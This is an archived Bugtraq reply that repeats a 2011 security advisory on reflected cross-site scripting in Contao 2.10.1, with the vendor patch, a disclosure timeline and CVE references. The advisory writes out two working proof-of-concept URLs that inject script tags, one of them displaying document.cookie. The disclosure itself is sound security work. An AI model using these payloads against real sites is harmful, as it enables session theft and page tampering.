Re: Contao 2.10.1 Cross-site scripting vulnerability

---

• From: Henri Salo <henri@xxxxxxx>
• Date: Thu, 1 Dec 2011 02:44:29 +0200

---

On Sat, Oct 08, 2011 at 07:59:27AM +0000, sschurtz@xxxxxxxxxxx wrote:

Advisory: Contao 2.10.1 Cross-site scripting vulnerability
Advisory ID: SSCHADV2011-025
Author: Stefan Schurtz
Affected Software: Successfully tested on Contao 2.10.1
Vendor URL: http://www.contao.org/
Vendor Status: fixed
CVE-ID: -

==========================
Vulnerability Description:
==========================

Contao 2.10 is prone to multiple Cross-site scripting vulnerability

==================
Technical Details:
==================

http://<target>/contao-2.10.1/index.php/teachers.html?"/><script>alert('xss')</script>
http://<target>/contao-2.10.1/index.php/teachers/'"</style></script><script>alert(document.cookie)</script>

=========
Solution:
=========

- Vendor patch available - http://dev.contao.org/projects/typolight/repository/revisions/1041
- Release of a new version 2.10.2 next week

====================
Disclosure Timeline:
====================

07-Oct-2011 - informed developers (contao@xxxxxxxxxxxxxx)
07-Oct-2011 - vendor fix
08-Oct-2011 - release date of this security advisory

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.contao.org/
http://dev.contao.org/projects/typolight/repository/revisions/1041
http://www.rul3z.de/advisories/SSCHADV2011-025.txt

http://osvdb.org/show/osvdb/76293
CVE-2011-4335

- Henri Salo

---

• Prev by Date: Re: [MajorSecurity SA-081]Contao CMS 2.9.2 - Persistent Cross Site Scripting Issue
• Next by Date: Ariadne 2.7.6 Multiple XSS vulnerabilities
• Previous by thread: Re: [MajorSecurity SA-081]Contao CMS 2.9.2 - Persistent Cross Site Scripting Issue
• Next by thread: Ariadne 2.7.6 Multiple XSS vulnerabilities
• Index(es):
  • Date
  • Thread

---

Relevant Pages [NT] ActiveSync Denial of Service Vulnerability ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... By "pretending" to be an iPAQ and connecting to TCP port 5679, ... sending a corrupted "I would like to sync with you" packet, ... Sample code to demonstrate the vulnerability is shown below: ... (Securiteam) [Full-disclosure] Microsoft SQL Server 2005 sp_replwritetovarbin memory overwrite (update to SEC ... (Microsoft SQL Server sp_replwritetovarbin limited memory overwrite ... This vulnerability has been described in a prior security ... Our public security advisory has been updated accordingly: ... Remove the sp_replwriterovarbin extended stored procedure. ... (Full-Disclosure) Re: MS09-032 Installation ... Security Advisory 953839, Microsoft Security Advisory 956391, Microsoft ... Vulnerability - CVE-2008-0015, as does the FixIt some had used before ... be a mistake to "undo" the workaround, ... What would happen if I install this update and then undo the ... (microsoft.public.security) Microsoft SQL Server 2005 sp_replwritetovarbin memory overwrite (update to SEC Consult SA-200812 ... (Microsoft SQL Server sp_replwritetovarbin limited memory overwrite ... This vulnerability has been described in a prior security ... Our public security advisory has been updated accordingly: ... Remove the sp_replwriterovarbin extended stored procedure. ... (Bugtraq) WSPortal version 1.0 Path Disclosure Vulnerability ... WSPortal version 1.0 Path Disclosure Vulnerability ... WSPortal is a site management system coded in PHP/MySQL. ... There is no official fix at the release of this Security Advisory. ... (Bugtraq)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > bugtraq  > 2011-12